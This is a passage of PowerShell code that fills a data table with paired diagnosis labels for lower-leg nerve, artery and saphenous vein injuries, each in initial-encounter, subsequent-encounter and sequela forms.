$DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, unspecified leg","Injury of cutaneous sensory nerve at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, right leg","Injury of cutaneous sensory nerve at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, right leg","Injury of cutaneous sensory nerve at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, right leg","Injury of cutaneous sensory nerve at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, left leg","Injury of cutaneous sensory nerve at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, left leg","Injury of cutaneous sensory nerve at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of cutaneous sensory nerve at lower leg level, left leg","Injury of cutaneous sensory nerve at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, right leg","Injury of other nerves at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, right leg","Injury of other nerves at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, right leg","Injury of other nerves at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, left leg","Injury of other nerves at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, left leg","Injury of other nerves at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, left leg","Injury of other nerves at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, unspecified leg","Injury of other nerves at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, unspecified leg","Injury of other nerves at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of other nerves at lower leg level, unspecified leg","Injury of other nerves at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, unspecified leg","Injury of unspecified nerve at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, unspecified leg","Injury of unspecified nerve at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, unspecified leg","Injury of unspecified nerve at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, right leg","Injury of unspecified nerve at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, right leg","Injury of unspecified nerve at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, right leg","Injury of unspecified nerve at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, left leg","Injury of unspecified nerve at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, left leg","Injury of unspecified nerve at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Injury of unspecified nerve at lower leg level, left leg","Injury of unspecified nerve at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, right leg","Unspecified injury of popliteal artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, right leg","Unspecified injury of popliteal artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, right leg","Unspecified injury of popliteal artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, left leg","Unspecified injury of popliteal artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, left leg","Unspecified injury of popliteal artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, left leg","Unspecified injury of popliteal artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, unspecified leg","Unspecified injury of popliteal artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, unspecified leg","Unspecified injury of popliteal artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of popliteal artery, unspecified leg","Unspecified injury of popliteal artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, right leg","Laceration of popliteal artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, right leg","Laceration of popliteal artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, right leg","Laceration of popliteal artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, left leg","Laceration of popliteal artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, left leg","Laceration of popliteal artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, left leg","Laceration of popliteal artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, unspecified leg","Laceration of popliteal artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, unspecified leg","Laceration of popliteal artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of popliteal artery, unspecified leg","Laceration of popliteal artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, right leg","Other specified injury of popliteal artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, right leg","Other specified injury of popliteal artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, right leg","Other specified injury of popliteal artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, left leg","Other specified injury of popliteal artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, left leg","Other specified injury of popliteal artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, left leg","Other specified injury of popliteal artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, unspecified leg","Other specified injury of popliteal artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, unspecified leg","Other specified injury of popliteal artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of popliteal artery, unspecified leg","Other specified injury of popliteal artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, right leg","Unspecified injury of unspecified tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, right leg","Unspecified injury of unspecified tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, right leg","Unspecified injury of unspecified tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, left leg","Unspecified injury of unspecified tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, left leg","Unspecified injury of unspecified tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, left leg","Unspecified injury of unspecified tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, unspecified leg","Unspecified injury of unspecified tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, unspecified leg","Unspecified injury of unspecified tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of unspecified tibial artery, unspecified leg","Unspecified injury of unspecified tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, right leg","Laceration of unspecified tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, right leg","Laceration of unspecified tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, right leg","Laceration of unspecified tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, left leg","Laceration of unspecified tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, left leg","Laceration of unspecified tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, left leg","Laceration of unspecified tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, unspecified leg","Laceration of unspecified tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, unspecified leg","Laceration of unspecified tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of unspecified tibial artery, unspecified leg","Laceration of unspecified tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, right leg","Other specified injury of unspecified tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, right leg","Other specified injury of unspecified tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, right leg","Other specified injury of unspecified tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, left leg","Other specified injury of unspecified tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, left leg","Other specified injury of unspecified tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, left leg","Other specified injury of unspecified tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, unspecified leg","Other specified injury of unspecified tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, unspecified leg","Other specified injury of unspecified tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of unspecified tibial artery, unspecified leg","Other specified injury of unspecified tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, right leg","Unspecified injury of anterior tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, right leg","Unspecified injury of anterior tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, right leg","Unspecified injury of anterior tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, left leg","Unspecified injury of anterior tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, left leg","Unspecified injury of anterior tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, left leg","Unspecified injury of anterior tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, unspecified leg","Unspecified injury of anterior tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, unspecified leg","Unspecified injury of anterior tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of anterior tibial artery, unspecified leg","Unspecified injury of anterior tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, right leg","Laceration of anterior tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, right leg","Laceration of anterior tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, right leg","Laceration of anterior tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, left leg","Laceration of anterior tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, left leg","Laceration of anterior tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, left leg","Laceration of anterior tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, unspecified leg","Laceration of anterior tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, unspecified leg","Laceration of anterior tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of anterior tibial artery, unspecified leg","Laceration of anterior tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, right leg","Other specified injury of anterior tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, right leg","Other specified injury of anterior tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, right leg","Other specified injury of anterior tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, left leg","Other specified injury of anterior tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, left leg","Other specified injury of anterior tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, left leg","Other specified injury of anterior tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, unspecified leg","Other specified injury of anterior tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, unspecified leg","Other specified injury of anterior tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of anterior tibial artery, unspecified leg","Other specified injury of anterior tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, right leg","Unspecified injury of posterior tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, right leg","Unspecified injury of posterior tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, right leg","Unspecified injury of posterior tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, left leg","Unspecified injury of posterior tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, left leg","Unspecified injury of posterior tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, left leg","Unspecified injury of posterior tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, unspecified leg","Unspecified injury of posterior tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, unspecified leg","Unspecified injury of posterior tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of posterior tibial artery, unspecified leg","Unspecified injury of posterior tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, right leg","Laceration of posterior tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, right leg","Laceration of posterior tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, right leg","Laceration of posterior tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, left leg","Laceration of posterior tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, left leg","Laceration of posterior tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, left leg","Laceration of posterior tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, unspecified leg","Laceration of posterior tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, unspecified leg","Laceration of posterior tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of posterior tibial artery, unspecified leg","Laceration of posterior tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, right leg","Other specified injury of posterior tibial artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, right leg","Other specified injury of posterior tibial artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, right leg","Other specified injury of posterior tibial artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, left leg","Other specified injury of posterior tibial artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, left leg","Other specified injury of posterior tibial artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, left leg","Other specified injury of posterior tibial artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, unspecified leg","Other specified injury of posterior tibial artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, unspecified leg","Other specified injury of posterior tibial artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of posterior tibial artery, unspecified leg","Other specified injury of posterior tibial artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, right leg","Unspecified injury of peroneal artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, right leg","Unspecified injury of peroneal artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, right leg","Unspecified injury of peroneal artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, left leg","Unspecified injury of peroneal artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, left leg","Unspecified injury of peroneal artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, left leg","Unspecified injury of peroneal artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, unspecified leg","Unspecified injury of peroneal artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, unspecified leg","Unspecified injury of peroneal artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of peroneal artery, unspecified leg","Unspecified injury of peroneal artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, right leg","Laceration of peroneal artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, right leg","Laceration of peroneal artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, right leg","Laceration of peroneal artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, left leg","Laceration of peroneal artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, left leg","Laceration of peroneal artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, left leg","Laceration of peroneal artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, unspecified leg","Laceration of peroneal artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, unspecified leg","Laceration of peroneal artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of peroneal artery, unspecified leg","Laceration of peroneal artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, right leg","Other specified injury of peroneal artery, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, right leg","Other specified injury of peroneal artery, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, right leg","Other specified injury of peroneal artery, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, left leg","Other specified injury of peroneal artery, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, left leg","Other specified injury of peroneal artery, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, left leg","Other specified injury of peroneal artery, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, unspecified leg","Other specified injury of peroneal artery, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, unspecified leg","Other specified injury of peroneal artery, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of peroneal artery, unspecified leg","Other specified injury of peroneal artery, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, right leg","Unspecified injury of greater saphenous vein at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, right leg","Unspecified injury of greater saphenous vein at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, right leg","Unspecified injury of greater saphenous vein at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, left leg","Unspecified injury of greater saphenous vein at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, left leg","Unspecified injury of greater saphenous vein at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, left leg","Unspecified injury of greater saphenous vein at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, unspecified leg","Unspecified injury of greater saphenous vein at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, unspecified leg","Unspecified injury of greater saphenous vein at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of greater saphenous vein at lower leg level, unspecified leg","Unspecified injury of greater saphenous vein at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, right leg","Laceration of greater saphenous vein at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, right leg","Laceration of greater saphenous vein at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, right leg","Laceration of greater saphenous vein at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, left leg","Laceration of greater saphenous vein at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, left leg","Laceration of greater saphenous vein at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, left leg","Laceration of greater saphenous vein at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, unspecified leg","Laceration of greater saphenous vein at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, unspecified leg","Laceration of greater saphenous vein at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of greater saphenous vein at lower leg level, unspecified leg","Laceration of greater saphenous vein at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, right leg","Other specified injury of greater saphenous vein at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, right leg","Other specified injury of greater saphenous vein at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, right leg","Other specified injury of greater saphenous vein at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, left leg","Other specified injury of greater saphenous vein at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, left leg","Other specified injury of greater saphenous vein at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, left leg","Other specified injury of greater saphenous vein at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, unspecified leg","Other specified injury of greater saphenous vein at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, unspecified leg","Other specified injury of greater saphenous vein at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of greater saphenous vein at lower leg level, unspecified leg","Other specified injury of greater saphenous vein at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, right leg","Unspecified injury of lesser saphenous vein at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, right leg","Unspecified injury of lesser saphenous vein at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, right leg","Unspecified injury of lesser saphenous vein at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, left leg","Unspecified injury of lesser saphenous vein at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, left leg","Unspecified injury of lesser saphenous vein at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, left leg","Unspecified injury of lesser saphenous vein at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, unspecified leg","Unspecified injury of lesser saphenous vein at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, unspecified leg","Unspecified injury of lesser saphenous vein at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of lesser saphenous vein at lower leg level, unspecified leg","Unspecified injury of lesser saphenous vein at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, right leg","Laceration of lesser saphenous vein at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, right leg","Laceration of lesser saphenous vein at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, right leg","Laceration of lesser saphenous vein at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, left leg","Laceration of lesser saphenous vein at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, left leg","Laceration of lesser saphenous vein at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, left leg","Laceration of lesser saphenous vein at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, unspecified leg","Laceration of lesser saphenous vein at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, unspecified leg","Laceration of lesser saphenous vein at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration of lesser saphenous vein at lower leg level, unspecified leg","Laceration of lesser saphenous vein at lower leg level, unspecified leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, right leg","Other specified injury of lesser saphenous vein at lower leg level, right leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, right leg","Other specified injury of lesser saphenous vein at lower leg level, right leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, right leg","Other specified injury of lesser saphenous vein at lower leg level, right leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, left leg","Other specified injury of lesser saphenous vein at lower leg level, left leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, left leg","Other specified injury of lesser saphenous vein at lower leg level, left leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, left leg","Other specified injury of lesser saphenous vein at lower leg level, left leg, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, unspecified leg","Other specified injury of lesser saphenous vein at lower leg level, unspecified leg, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of lesser saphenous vein at lower leg level, unspecified leg","Other specified injury of lesser saphenous vein at lower leg level, unspecified leg, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injury of 